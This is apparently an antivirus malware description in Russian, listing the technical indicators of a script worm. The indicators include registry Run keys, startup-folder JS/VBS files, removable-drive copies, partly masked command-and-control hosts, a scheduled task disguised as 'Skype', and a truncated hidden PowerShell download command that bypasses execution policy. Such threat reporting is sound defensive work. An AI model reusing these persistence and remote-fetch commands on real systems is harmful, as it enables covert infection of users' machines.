Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'XF8EX8K2CD' = '"%TEMP%\2.js"'
- %HOMEPATH%\Start Menu\Programs\Startup\2.js
- %HOMEPATH%\Start Menu\Programs\Startup\1.vbs
- <Имя диска съемного носителя>:\2.js
- %TEMP%\aut1.tmp
- %TEMP%\1.vbs
- %TEMP%\aut2.tmp
- %TEMP%\2.js
- %TEMP%\aut3.tmp
- %TEMP%\3.m3u
- <Имя диска съемного носителя>:\2.js
- %TEMP%\aut1.tmp
- %TEMP%\aut2.tmp
- %TEMP%\aut3.tmp
- 'localhost':1040
- '46.##1.250.197':8900
- 'sw##.fannan.se':8000
- DNS ASK sw##.fannan.se
- ClassName: 'ReBarWindow32' WindowName: ''
- ClassName: 'WMP9DeskBand' WindowName: 'WMP9DeskBand'
- '<SYSTEM32>\wscript.exe' "%TEMP%\2.js"
- '<SYSTEM32>\wscript.exe' "%TEMP%\1.vbs"
- '%ProgramFiles%\Windows Media Player\wmplayer.exe' /prefetch:6 /Open "%TEMP%\3.m3u"
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr "%TEMP%\2.js
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient....